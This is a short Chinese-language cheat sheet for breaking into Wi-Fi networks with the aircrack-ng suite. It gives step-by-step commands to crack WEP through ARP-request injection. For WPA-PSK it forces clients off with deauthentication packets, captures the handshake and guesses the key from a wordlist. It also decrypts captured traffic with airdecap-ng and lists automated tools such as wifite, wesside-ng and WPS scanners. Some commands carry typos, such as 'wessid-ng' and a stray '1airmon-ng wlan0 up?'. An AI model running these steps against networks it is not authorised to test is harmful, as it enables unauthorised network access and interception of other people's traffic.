破解WEP

由于wep破解基于有效数据报文的积累,当收集到足够数量的ivs数据报文后就可以进行破解,对目标ap使用arprequest注入攻击。

  1. ifconfig wlan0 up
  2. (airmon-ng start wlan0)
  3. airodump-ng -w 文件名 -c 频道 mon0
  4. aireplay-ng -3 -b AP的mac -h 客户端的mac mon0
  5. aircrack-ng 捕获的cap文件或ivs文件

破解WAP

WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要

  1. ifconfig wlan0 up
  2. 1airmon-ng wlan0 up?(airmon-ng start wlan0)
  3. airodump-ng -w 文件名 -c 频道 mon0
  4. aireplay-ng -0 10 -a AP的mac地址 -c 客户端的mac地址 mon0
  5. aircrack-ng -w 字典 捕获的cap文件 Linux下可以使用pyrit工具利用GPU加速破解密码;

aircrack-ng包含的主要组件

  • aircrack-ng:主要用于WEP及WPA-PSK密码的恢复,只要airodump-ng收集到足够数量的数据包。aircrack-ng就可以自动检测数据包并判断是否可以破解
  • airmon-ng:用于改变无线网卡工作模式,以便其他工具顺利使用
  • airodump-ng:用于捕获802.11数据报文,以便aircrack的破解
  • aireplay-ng:在进行WEP及WPA-PSK密码恢复时,可以根据需要创建特殊的无线网络数据报文及流量
  • airserv-ng:可以将无线网卡连接至某一特定端口,为攻击时灵活调用做准备
  • airolib-ng:进行WPA Rainbow Table攻击时使用,用于建立特定的数据库文件
  • airdecap-ng:用于解开处于加密状态的数据包
  • airdriver-ng:用于显示出aircrack-ng所支持的全部无线网卡芯片列表
  • airdecloak-ng:用于分析无线数据报文时过滤出指定无线网络数据
  • packetforge-ng:为注入攻击制作特殊加密报文,主要用于无线客户端破解攻击
  • wesside-ng:自动化的WEP破解攻击,加入fragementation攻击能力
  • tkiptun-ng:主要针对采用WPA TKIP加密且启用Qos的无线网络
  • easside-ng等

抓取无线数据报文:可以用airodump-ng、Wireshark等工具来对无线网进行抓包。通常无线数据加密是不可读取的,当安全人员或者攻击者破解出WEP或者WPA密码后,就可以用airdecap-ng来实现对原本加密的危险数据进行解密,具体命令如下: (WPA)airdecap-ng -l -e 目标ap的essid -p WPA密码 无线数据报文 (WEP)airdecap-ng -w WEP密钥(十六进制码) 捕获的无线数据包

解密后就可以使用Wireshark工具开打开解密的无线数据报文

  • ivstool工具:

    1. 合并ivs文件:ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs
    2. 转换cap文件为ivs文件ivstools --convert test.cap test.ivs

将cap文件转换为ivs文件不但可以提高破解效率,也可以减少cap文件占据的空间。

wifi全自动破解工具:wifite

WEP自动化破解工具:wessid-ng -v ap的mac地址 -k 重传次数 -i 无线网卡 wpa自动化攻击工具:(效果不行)tkiptun-ng -h 客户端的mac地址 -a ap的mac地址 -m 最小数据包 -n 最大数据包 网卡

wps扫描工具:wpscan.py和wpspy.py ./wpscan.py -i mon0 wpspy.py -i mon0 -e ap的mac地址(可选)探测wps的状态

airdecloak过滤数据包 airdecloak-ng --bssid mac地址--filters signal -i 捕获的数据报文